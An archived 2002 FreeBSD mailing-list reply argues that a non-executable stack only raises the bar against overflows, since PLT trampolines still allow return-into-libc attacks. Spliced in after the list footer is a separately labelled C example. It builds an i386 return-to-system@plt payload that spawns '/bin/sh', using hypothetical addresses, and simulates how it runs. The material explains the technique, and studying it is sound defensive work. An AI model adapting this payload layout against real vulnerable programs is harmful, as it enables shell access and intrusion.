Date:      Sun, 30 Jun 2002 00:00:05 -0700
From:      Peter Wemm <peter@wemm.org>
To:        Terry Lambert <tlambert2@mindspring.com>
Cc:        arch@FreeBSD.ORG
Subject:   Re: Time to make the stack non-executable? 
Message-ID:  <20020630070005.092FD390F@overcee.wemm.org>
In-Reply-To: <3D1E3126.C96FFAA5@mindspring.com> 

Terry Lambert wrote:

> Sean Eric Fagan and I discussed this several years ago, and we
> discussed it again the other day, before this attack hit.  It
> looks like it's an idea whose time has come.

The Linux folks have been tinkering with this on and off for years. There's
one problem.  Making the stack not-executable only makes exploits a bit
harder, but doesn't solve the problem.  There is some nice executable
trampoline code in the ELF PLT that can be abused to make libc do the
execution part for you.

i.e.: most stack overflow holes would still be exploitable.  It just makes it
a little harder since you can only push data instead of shellcode.  But
that's all there is to it: you push your args, then set the return address
to point to the PLT trampoline, and in most cases you are home.

Making the stack non-executable is not the final solution.  It just raises
the bar a bit.

Note that I'm not saying that we shouldn't do it, just do not have
unrealistic expectations for it.

Cheers,
-Peter
--
Peter Wemm - peter@wemm.org; peter@FreeBSD.org; peter@yahoo-inc.com
"All of this is for nothing if we don't go to the stars" - JMS/B5


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-arch" in the body of the message
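The technique Peter describes above, as an added example that is not part of the original message or of any FreeBSD code: a model of the classic i386 return-into-PLT frame. The attacker's payload is pure data (padding, the address of a PLT stub, a fake return address, and a pointer to an argument string); the only code that runs is the PLT stub already in the binary's text segment, which is why a non-executable stack alone does not stop it. The buffer size, saved-ebp distance, text-segment bounds and every address below are assumed values for illustration, not taken from any real binary.

```c
/* Added example (not from the original mail): a constructed model of a
 * return-into-PLT payload on i386 and of what the CPU does at `ret`.
 * All sizes and addresses are hypothetical. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE   64             /* assumed size of the overflowed buffer */
#define SAVED_EBP  4              /* saved frame pointer sits between buffer and return address */
#define SYSTEM_PLT 0x08048350u    /* assumed address of system@plt in the victim's text */
#define EXIT_PLT   0x08048360u    /* assumed address of exit@plt (fake return for system) */
#define BINSH_ADDR 0xbfff0f00u    /* assumed address of a "/bin/sh" string in memory */
#define TEXT_LO    0x08048000u    /* assumed bounds of the executable text segment */
#define TEXT_HI    0x08049000u

static void put_le32(uint8_t *p, uint32_t v) {
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = v >> 24;
}
static uint32_t get_le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Build the overflow payload. After the padding the layout is exactly what a
 * cdecl callee expects on entry:
 *   [system@plt] [return address for system] [arg0 = pointer to "/bin/sh"]
 * Returns the payload length, or 0 if the output buffer is too small. */
size_t build_ret2plt_payload(uint8_t *out, size_t outlen) {
    size_t pad  = BUF_SIZE + SAVED_EBP;   /* bytes up to the saved return address */
    size_t need = pad + 3 * 4;
    if (outlen < need) return 0;
    memset(out, 'A', pad);                /* filler: never executed */
    put_le32(out + pad,     SYSTEM_PLT);  /* overwrites the saved return address */
    put_le32(out + pad + 4, EXIT_PLT);    /* where system() "returns" to */
    put_le32(out + pad + 8, BINSH_ADDR);  /* first argument seen by system() */
    return need;
}

/* What the victim's epilogue does with that stack: `ret` pops the saved
 * return address into the PC; the PLT stub then runs with [esp] = its own
 * return address and [esp+4] = its first cdecl argument. */
typedef struct { uint32_t pc; uint32_t ret_after; uint32_t arg0; } callsite;

int simulate_ret(const uint8_t *stack, size_t len, callsite *cs) {
    size_t ra = BUF_SIZE + SAVED_EBP;
    if (len < ra + 12) return -1;
    cs->pc        = get_le32(stack + ra);       /* popped by `ret` */
    cs->ret_after = get_le32(stack + ra + 4);   /* [esp] inside the stub */
    cs->arg0      = get_le32(stack + ra + 8);   /* [esp+4]: the argument */
    return 0;
}

/* The non-executable-stack check would only matter if the PC landed in the
 * stack; here it lands in text, which must be executable for the program to
 * run at all. */
int target_in_text(uint32_t addr) {
    return addr >= TEXT_LO && addr < TEXT_HI;
}

int main(void) {
    uint8_t payload[256];
    size_t n = build_ret2plt_payload(payload, sizeof payload);
    callsite cs;
    if (n == 0 || simulate_ret(payload, n, &cs) != 0) return 1;
    printf("payload: %zu bytes of data, no machine code\n", n);
    printf("ret -> 0x%08x (%s), arg0=0x%08x, system returns to 0x%08x\n",
           cs.pc, target_in_text(cs.pc) ? "text segment" : "not text",
           cs.arg0, cs.ret_after);
    return 0;
}
```

The frame order matters: the word right after the stub address is consumed as the stub's return address, so the argument must come one word later. Nothing in the payload is executed as code, which is the point of the message above.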

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20020630070005.092FD390F>